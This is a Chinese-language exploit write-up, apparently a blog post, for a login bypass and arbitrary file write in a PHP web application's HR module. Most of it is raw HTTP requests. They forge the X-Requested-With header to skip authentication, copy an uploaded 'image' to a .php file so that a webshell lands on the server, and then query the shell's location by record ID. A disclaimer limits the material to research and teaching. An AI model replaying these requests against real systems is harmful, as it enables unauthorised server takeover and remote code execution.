漏洞详情
漏洞原理
inc/auth.php的登录验证在未登录情况下会获取X-Requested-With的值,如果等于”LOGIN_USER_ID“就会直接结束,不等于时会使用header跳转到登录页面,但是header跳转会继续执行接下来的逻辑。又因为X-Requested-With是用户可控的,所以使他不等于“LOGIN_USER_ID“后让代码继续执行下去,实现登录绕过功能
漏洞利用
找到一处功能点,在复制图片的时候文件后缀可控,虽然文件名未返回但是已经写入了数据库,再通过id查询出文件名就完事了呗
数据包
1、ATTACHMENT_path的后缀才是复制之后文件的后缀
2、HR_ID是用来查询shell地址的参数
3、ATTACHMENT_PIC为shell内容
ATTACHMENT_path可控,如果为jsp文件,直接就把图片copy为jsp了
当存在id参数,则执行update,若没有则执行insert语句,为了用已知id来查询文件名的作用,所以给id传一个存在的值(HR_ID)
POST /general/hrms/manage/submit.php HTTP/1.1
Host: *********
Content-Length: 4448
Accept: */*
X-Requested-With: 123
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.43
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynSLonX7ReNBG43C7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=4305accfef8d87e8907003d2e2b40a55; LOGIN_LANG=cn
Connection: close
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="HR_ID"
1
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ID"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="USER_ID"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="photo"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ATTACHMENT_PIC_NAME"
C:\fakepath\4.jpg
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ATTACHMENT_ID_OLD"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ATTACHMENT_NAME_OLD"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="OPERATOR"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="DEPT_ID"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="check_hr_no"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="NO"
1
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="hr_name"
123
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="STATUS"
1
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="sex"
2
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="dept_id"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="BIRTHDAY"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="MARRY"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="EDUCATION"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ATTACHMENT_path"
C:\fakepath\4.php
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="ATTACHMENT_PIC"; filename="4.jpg"
Content-Type: image/jpeg
<?php echo 1;?>
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="WORK_DATE"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="JOIN_DATE"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="LABOR_START_TIME"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="LABOR_END_TIME"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="POST"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="POLITICS"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="NATION"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="CARD_NO"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="NATIVE_PLACE"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="SPECIALITY"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="SCHOOL"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="CERTIFICATE"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="HOME_ADDR"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="HOME_TEL"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="EMAIL"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="REWARD"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="TRAIN"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="EDU"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="WORK"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="SOCIATY"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="RESUME"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="OTHERS"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="file_elem"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name="attachmentIDStr"
------WebKitFormBoundarynSLonX7ReNBG43C7
Content-Disposition: form-data; name=" attachmentNameStr"
------WebKitFormBoundarynSLonX7ReNBG43C7--
如果返回包302,并且内部报错,则写入成功
通过id查询shell地址
POST /general/hrms/manage/hrms.php?HR_ID=1 HTTP/1.1
Host: *************
Content-Length: 0
Accept: */*
X-Requested-With: 123
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.43
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynSLonX7ReNBG43C7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=4305accfef8d87e8907003d2e2b40a55; LOGIN_LANG=cn
Connection: close
总结
该漏洞修复有点快
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论